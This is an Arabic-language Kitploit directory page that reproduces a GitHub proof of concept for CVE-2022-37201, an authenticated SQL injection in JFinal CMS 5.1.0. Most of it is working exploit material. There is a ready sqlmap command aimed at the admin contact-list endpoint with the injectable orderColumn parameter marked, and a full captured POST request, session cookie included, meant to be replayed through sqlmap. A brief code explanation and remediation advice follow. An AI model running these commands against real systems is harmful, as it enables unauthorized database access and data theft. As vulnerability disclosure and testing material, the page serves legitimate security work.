Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-37201 — CVE-2022-37201 POC | Kitploit
أدوات/GitHubGitHub/againstthelight/cve-2022-37201
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubagainstthelight/cve-2022-37201

CVE-2022-37201

CVE-2022-37201 POC

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-37201

CVE-2022-37201 POC

إثبات المفهوم

أولاً، يجب عليك تثبيت sqlmap

تحتاج إلى تعيين

  • النطاق المستهدف أو عنوان IP
  • ملف تعريف الارتباط الخاص بك

ثم قم بتشغيل الأمر

root@kitploit:~
sqlmap -u http://targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list  --thread 8 --batch --smart  --random-agent --data "
form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db

image-20220730053527316

أحيانًا يجب أن تعلم أن المسار /jfinal_cms/ ليس ضروريًا، بل تحتاج إلى تحديد المسار

المبدأ

يمكنك رؤية كود الواجهة /system/menu/list

root@kitploit:~
sql.append(" order by ").append(orderBy);

هناك عبارة SQL مباشرة تم دمجها

علاوة على ذلك

لا يوجد إجراء لمنع حقن SQL لأن حقن SQL مطلوب هنا

الحل

من خلال تحليل نقطة الوظيفة هذه، وجدت أن حقن orderby ثابت، مثل id و name و menu key، لذا يمكنك محاولة استخدام استعلام معلمي أو إنشاء قائمة بيضاء

ما هو أكثر

اختباري

root@kitploit:~
POST /jfinal_cms/admin/contact/list HTTP/1.1
Host: 172.30.48.1
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.30.48.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.30.48.1/jfinal_cms/admin/contact/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
Connection: close

form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10

قم بتشغيلها في sqlmap!!! استخدم -r

[الوصف المقترح] JFinal CMS 5.1.0 معرض لحقن SQL.


[معلومات إضافية] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md


[نوع الثغرة] حقن SQL


[بائع المنتج] مجموعة التطوير


[قاعدة كود المنتج المتأثر] https://github.com/jflyfox/jfinal_cms - JFinal CMS 5.1.0


[المكون المتأثر] لا تستخدم هذه الواجهات نفس المكون، كما أنها لا تحتوي على عوامل تصفية، بل يستخدم كل منها طريقة دمج SQL الخاصة به، مما يؤدي إلى حقن SQL


[نوع الهجوم] عن بعد


[تأثير تنفيذ الكود] true


[تأثير كشف المعلومات] true


[نواقل الهجوم] مطلوب تسجيل دخول المستخدم


[المرجع] https://github.com/AgainstTheLight/someEXP_of_jfinal_cms/blob/main/jfinal_cms/sql4.md


[المكتشف] jw5t

تنزيل الأداة